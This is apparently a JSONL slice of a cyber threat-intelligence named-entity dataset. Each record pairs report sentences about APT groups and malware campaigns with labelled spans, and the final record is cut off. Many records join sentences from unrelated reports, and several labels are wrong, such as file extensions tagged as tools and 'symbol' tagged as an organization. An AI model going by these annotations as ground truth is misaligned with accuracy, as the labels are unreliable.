{"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": {"TOOL: doc": [[107, 110]], "TOOL: docx": [[113, 117]], "TOOL: ppt": [[120, 123]], "TOOL: pptx": [[126, 130]], "TOOL: pps": [[133, 136]], "TOOL: ppsx": [[139, 143]], "TOOL: xls": [[146, 149]], "TOOL: xlsx": [[152, 156]], "TOOL: pdf": [[163, 166]], "MALWARE: KeyBoy samples": [[207, 221]]}, "info": {"id": "cyberner_stix_train_007889", "source": "cyberner_stix_train"}}
{"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples . APT17 : 130.184.156.62 . Its code identifies the victim ’s browser and then serves one of two exploits .", "spans": {"ORGANIZATION: symbol": [[99, 105]], "ORGANIZATION: ESET": [[194, 198]], "TOOL: Win32/Potao": [[239, 250]], "TOOL: Win32/FakeTC samples": [[255, 275]], "THREAT_ACTOR: APT17": [[278, 283]], "IP_ADDRESS: 130.184.156.62": [[286, 300]]}, "info": {"id": "cyberner_stix_train_007890", "source": "cyberner_stix_train"}}
{"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page . Development of Bemstour has continued into 2019 . Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": {"SYSTEM: Facebook": [[64, 72]], "MALWARE: Bemstour": [[101, 109]]}, "info": {"id": "cyberner_stix_train_007891", "source": "cyberner_stix_train"}}
{"text": "While the behavior of the attackers differs slightly in each compromise , generally once the attackers have identified the desired intellectual property , they copy the content to archives on internal systems they use as internal staging servers .", "spans": {}, "info": {"id": "cyberner_stix_train_007892", "source": "cyberner_stix_train"}}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "ORGANIZATION: embassies": [[175, 184]]}, "info": {"id": "cyberner_stix_train_007893", "source": "cyberner_stix_train"}}
{"text": "Instead of being written in Assembly or C , it was written in C++ , which provides added layers of abstraction for the developer ’s perusal , at the cost of added complexity .", "spans": {"TOOL: C": [[40, 41]], "TOOL: C++": [[62, 65]]}, "info": {"id": "cyberner_stix_train_007894", "source": "cyberner_stix_train"}}
{"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "THREAT_ACTOR: MUSTANG PANDA": [[125, 138]], "MALWARE: PowerShell scripts": [[209, 227]], "MALWARE: Microsoft Office documents": [[232, 258]], "ORGANIZATION: NGOs": [[299, 303]]}, "info": {"id": "cyberner_stix_train_007895", "source": "cyberner_stix_train"}}
{"text": "EventBot Updated library naming convention EventBot New library naming convention . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company .", "spans": {"MALWARE: EventBot": [[43, 51]], "MALWARE: POWERSTATS": [[242, 252]], "MALWARE: PowerShell backdoor": [[267, 286]], "THREAT_ACTOR: threat group": [[295, 307]], "ORGANIZATION: Mandiant": [[326, 334]], "THREAT_ACTOR: APT35": [[370, 375]], "ORGANIZATION: energy company": [[389, 403]]}, "info": {"id": "cyberner_stix_train_007896", "source": "cyberner_stix_train"}}
{"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim ’ s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"MALWARE: EventBot": [[21, 29]], "SYSTEM: Android": [[81, 88]], "MALWARE: configuration file": [[267, 285]], "THREAT_ACTOR: OilRig group": [[381, 393]], "ORGANIZATION: financial": [[455, 464]], "ORGANIZATION: government": [[467, 477]], "ORGANIZATION: energy": [[480, 486]], "ORGANIZATION: chemical": [[489, 497]], "ORGANIZATION: telecommunications": [[500, 518]]}, "info": {"id": "cyberner_stix_train_007897", "source": "cyberner_stix_train"}}
{"text": "Even if the noisy initial CozyDuke campaign is noticed by the victim organization , or by someone else who then makes it publicly known , defenders will begin by first looking for indicators of compromise ( IOCs ) related to the CozyDuke toolset .", "spans": {"MALWARE: CozyDuke": [[26, 34], [229, 237]], "TOOL: indicators of compromise": [[180, 204]], "TOOL: IOCs": [[207, 211]]}, "info": {"id": "cyberner_stix_train_007898", "source": "cyberner_stix_train"}}
{"text": "This helps protect sensitive information and critical services , and limits damage from network perimeter breaches .", "spans": {}, "info": {"id": "cyberner_stix_train_007899", "source": "cyberner_stix_train"}}
{"text": "During a high profile incident we investigated , our products successfully detected and blocked a “ standard ” Sofacy “ AZZY ” sample that was used to target a range of defense contractors .", "spans": {"THREAT_ACTOR: Sofacy": [[111, 117]], "MALWARE: AZZY": [[120, 124]]}, "info": {"id": "cyberner_stix_train_007900", "source": "cyberner_stix_train"}}
{"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": {"THREAT_ACTOR: PLATINUM": [[11, 19]], "VULNERABILITY: zero-day exploits": [[37, 54], [289, 306], [358, 375]], "ORGANIZATION: Falcon Intelligence": [[400, 419]], "MALWARE: infection chain": [[478, 493]]}, "info": {"id": "cyberner_stix_train_007901", "source": "cyberner_stix_train"}}
{"text": "In particular , avoid side-loading apps from third-party app stores and avoid the temptation to play games that are not yet available on Android . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.” Henkel claims that a very small portion” of its worldwide IT systems had been aected — the systems in Germany . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 .", "spans": {"SYSTEM: Android": [[137, 144]], "THREAT_ACTOR: Winnti": [[174, 180]], "THREAT_ACTOR: Gallmaker": [[485, 494]]}, "info": {"id": "cyberner_stix_train_007902", "source": "cyberner_stix_train"}}
{"text": "Attackers are making growing use of utilities like Winexe and PSExec to perform lateral movement across compromised networks .", "spans": {"TOOL: Winexe": [[51, 57]], "TOOL: PSExec": [[62, 68]]}, "info": {"id": "cyberner_stix_train_007903", "source": "cyberner_stix_train"}}
{"text": "RAR SFX directives are used to display the decoy while the malicious payload is executed .", "spans": {"TOOL: RAR": [[0, 3]], "TOOL: SFX": [[4, 7]]}, "info": {"id": "cyberner_stix_train_007904", "source": "cyberner_stix_train"}}
{"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": {"THREAT_ACTOR: actor": [[32, 37]], "MALWARE: HyperBro Trojan": [[248, 263]]}, "info": {"id": "cyberner_stix_train_007905", "source": "cyberner_stix_train"}}
{"text": "If the data received from the C2 server starts with the same string , then the remainder of the payload is decompressed using ORat 's \"deflate\" algorithm and called as a function .", "spans": {"TOOL: C2": [[30, 32]], "MALWARE: ORat": [[126, 130]]}, "info": {"id": "cyberner_stix_train_007906", "source": "cyberner_stix_train"}}
{"text": "As originally detailed in Kaspersky ’s whitepaper , the MiniDuke campaigns from February 2013 employed spear-phishing emails with malicious PDF file attachments .", "spans": {"ORGANIZATION: Kaspersky": [[26, 35]], "MALWARE: MiniDuke": [[56, 64]], "TOOL: emails": [[118, 124]], "TOOL: PDF": [[140, 143]]}, "info": {"id": "cyberner_stix_train_007907", "source": "cyberner_stix_train"}}
{"text": "id= $ NUM ” . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir . Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . But what happens when an unidentified virus infects a victims computer Antivirus programs can only protect against threats they already know .", "spans": {"ORGANIZATION: email provider": [[106, 120]], "THREAT_ACTOR: Gamaredon": [[214, 223]], "FILEPATH: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[226, 290]], "MALWARE: unidentified virus": [[318, 336]], "ORGANIZATION: Antivirus programs": [[364, 382]]}, "info": {"id": "cyberner_stix_train_007908", "source": "cyberner_stix_train"}}
{"text": "Patchwork has also recently employed Android malware in its attacks , with its use of a customized version of AndroRAT . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "TOOL: Android malware": [[37, 52]], "TOOL: AndroRAT": [[110, 118]], "VULNERABILITY: zero-day": [[139, 147]], "VULNERABILITY: exploit": [[162, 169]], "VULNERABILITY: CVE-2015-2545": [[172, 185]], "THREAT_ACTOR: PLATINUM": [[196, 204]]}, "info": {"id": "cyberner_stix_train_007909", "source": "cyberner_stix_train"}}
{"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and aACT from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . This ACT , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their LOCs of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"ORGANIZATION: Kaspersky": [[13, 22], [15759, 15768], [16990, 16999]], "THREAT_ACTOR: NetTraveler": [[38, 49]], "THREAT_ACTOR: APT41": [[159, 164], [357, 362], [493, 498], [2555, 2560]], "TOOL: Master Boot Record": [[196, 214]], "TOOL: (MBR)": [[215, 220]], "THREAT_ACTOR: group's": [[692, 699]], "ORGANIZATION: video game industry": [[737, 756]], "FILEPATH: BalkanRAT": [[793, 802], [1833, 1842]], "FILEPATH: BalkanDoor": [[914, 924], [1847, 1857], [2111, 2121]], "TOOL: emails": [[1056, 1062], [6596, 6602], [11309, 11315], [13122, 13128], [15517, 15523], [18085, 18091]], "THREAT_ACTOR: attackers": [[1121, 1130], [5163, 5172], [5461, 5470], [10728, 10737]], "ORGANIZATION: financial": [[1160, 1169]], "ORGANIZATION: Serbian security": [[1278, 1294]], "THREAT_ACTOR: attacks": [[1525, 1532]], "THREAT_ACTOR: BalkanDoor": [[1711, 1721]], "VULNERABILITY: exploit": [[1771, 1778], [2270, 2277], [6138, 6145], [6341, 6348], [7089, 7096], [7120, 7127]], "TOOL: WinRAR": [[1786, 1792], [2282, 2288], [8795, 8801]], "VULNERABILITY: CVE-2018-20250": [[1811, 1825], [2307, 2321]], "THREAT_ACTOR: attacker": [[2358, 2366], [6355, 6363], [7217, 7225], [11681, 11689], [20947, 20955]], "MALWARE: BalkanRAT": [[2424, 2433]], "MALWARE: BalkanDoor backdoor": [[2489, 2508]], "MALWARE: ADORE.XSEC": [[2571, 2581]], "SYSTEM: Linux": [[2586, 2591], [2665, 2670]], "FILEPATH: backdoor": [[2689, 2697]], "FILEPATH: BalkanRAT malware": [[2809, 2826]], "THREAT_ACTOR: APT41's": [[2918, 2925]], "MALWARE: POISONPLUG": [[2926, 2936]], "ORGANIZATION: Encrypt": [[3209, 3216]], "ORGANIZATION: CERT 360": [[3399, 3407]], "THREAT_ACTOR: BITTER APT": [[3429, 3439], [3804, 3814], [4049, 4059], [4246, 4256], [4402, 4412], [4855, 4865]], "THREAT_ACTOR: BITTER APT’s": [[3487, 3499]], "ORGANIZATION: government sites": [[3569, 3585]], "ORGANIZATION: enterprises": [[3602, 3613]], "ORGANIZATION: government": [[3732, 3742], [3840, 3850], [7978, 7988]], "ORGANIZATION: organisations": [[3762, 3775]], "ORGANIZATION: government agencies": [[4074, 4093]], "ORGANIZATION: 360-CERT": [[4151, 4159]], "ORGANIZATION: Anomali": [[4546, 4553]], "TOOL: email": [[4669, 4674]], "ORGANIZATION: 360 Threat Intelligence Center": [[4769, 4799]], "MALWARE: China Chopper": [[4936, 4949], [5336, 5349], [5481, 5494]], "THREAT_ACTOR: Leviathan": [[5018, 5027]], "THREAT_ACTOR: Threat Group-3390": [[5032, 5049]], "FILEPATH: China Chopper": [[5127, 5140], [5685, 5698], [7014, 7027]], "ORGANIZATION: Cisco Talos": [[5301, 5312]], "ORGANIZATION: government organization": [[5583, 5606]], "TOOL: Virtual Terminal": [[5725, 5741]], "FILEPATH: Mimikatz Lite": [[5946, 5959]], "FILEPATH: GetPassword.exe": [[5963, 5978]], "FILEPATH: tool": [[5985, 5989]], "THREAT_ACTOR: actor": [[6120, 6125]], "VULNERABILITY: CVE-2018–8440": [[6146, 6159]], "VULNERABILITY: vulnerability": [[6188, 6201], [8817, 8830]], "SYSTEM: Windows": [[6205, 6212], [6522, 6529], [7132, 7139]], "VULNERABILITY: proof-of-concept": [[6324, 6340]], "THREAT_ACTOR: Cloud Atlas": [[6544, 6555], [6910, 6921], [7279, 7290], [7497, 7508], [7552, 7563], [7653, 7664]], "ORGANIZATION: Palo Alto": [[6952, 6961]], "VULNERABILITY: CVE-2015-0062": [[7156, 7169]], "VULNERABILITY: CVE-2015-1701": [[7172, 7185]], "VULNERABILITY: CVE-2016-0099": [[7190, 7203]], "ORGANIZATION: Microsoft": [[7373, 7382], [20894, 20903]], "VULNERABILITY: CVE-2017-11882": [[7406, 7420]], "VULNERABILITY: CVE-2018-0802": [[7432, 7445]], "THREAT_ACTOR: Gamaredon Group": [[7893, 7908], [8135, 8150], [8416, 8431], [8434, 8449]], "ORGANIZATION: military": [[7993, 8001], [14779, 14787], [16879, 16887], [17393, 17401], [17837, 17845], [18019, 18027], [18537, 18545]], "ORGANIZATION: Presidential Administration": [[8342, 8369]], "ORGANIZATION: organizations": [[8477, 8490], [14788, 14801], [18841, 18854]], "MALWARE: documents": [[8569, 8578]], "THREAT_ACTOR: they": [[8594, 8598]], "MALWARE: (RMS)": [[8674, 8679]], "FILEPATH: archive": [[8749, 8756]], "THREAT_ACTOR: ITG08": [[8992, 8997], [9037, 9042], [9334, 9339], [9442, 9447], [9672, 9677], [9846, 9851], [10556, 10561], [10928, 10933], [11084, 11089], [11349, 11354], [11504, 11509], [11977, 11982]], "THREAT_ACTOR: FIN6": [[9014, 9018]], "ORGANIZATION: e-commerce environments": [[9071, 9094]], "ORGANIZATION: retailers": [[9579, 9588]], "ORGANIZATION: hospitality sector": [[9610, 9628]], "MALWARE: More_eggs backdoor": [[9688, 9706], [11992, 12010]], "THREAT_ACTOR: Attackers": [[9745, 9754], [17954, 17963]], "MALWARE: Comodo code-signing certificates": [[9857, 9889]], "THREAT_ACTOR: ITG08’s": [[9968, 9975], [11777, 11784], [12172, 12179]], "FILEPATH: More_eggs backdoor": [[10131, 10149], [10327, 10345]], "FILEPATH: More_eggs malware": [[10183, 10200]], "FILEPATH: cmd.exe": [[10284, 10291]], "ORGANIZATION: X-Force IRIS": [[10294, 10306]], "TOOL: Dynamic Link Library": [[10438, 10458]], "TOOL: DLL": [[10461, 10464]], "MALWARE: WMI": [[10616, 10619]], "MALWARE: PowerShell": [[10624, 10634], [12187, 12197]], "MALWARE: More_eggs": [[10908, 10917], [11478, 11487]], "MALWARE: Mimikatz": [[11005, 11013]], "MALWARE: More_eggs JScript backdoor": [[11113, 11139], [11377, 11403]], "FILEPATH: Mimikatz": [[11142, 11150]], "MALWARE: offensive security tools": [[11537, 11561]], "MALWARE: PowerShell scripts": [[11566, 11584]], "ORGANIZATION: IBM X-Force IRIS": [[11736, 11752]], "MALWARE: tools": [[11867, 11872]], "TOOL: PowerShell": [[12088, 12098]], "THREAT_ACTOR: LYCEUM": [[12234, 12240], [12406, 12412], [12968, 12974], [13096, 13102], [13470, 13476], [13575, 13581], [13924, 13930], [14054, 14060], [14155, 14161]], "ORGANIZATION: strategic national importance": [[12290, 12319]], "ORGANIZATION: oil and gas": [[12332, 12343]], "ORGANIZATION: telecommunications": [[12357, 12375]], "ORGANIZATION: CTU": [[12378, 12381], [12918, 12921], [13349, 13352], [13998, 14001], [14401, 14404]], "THREAT_ACTOR: COBALT GYPSY": [[12799, 12811]], 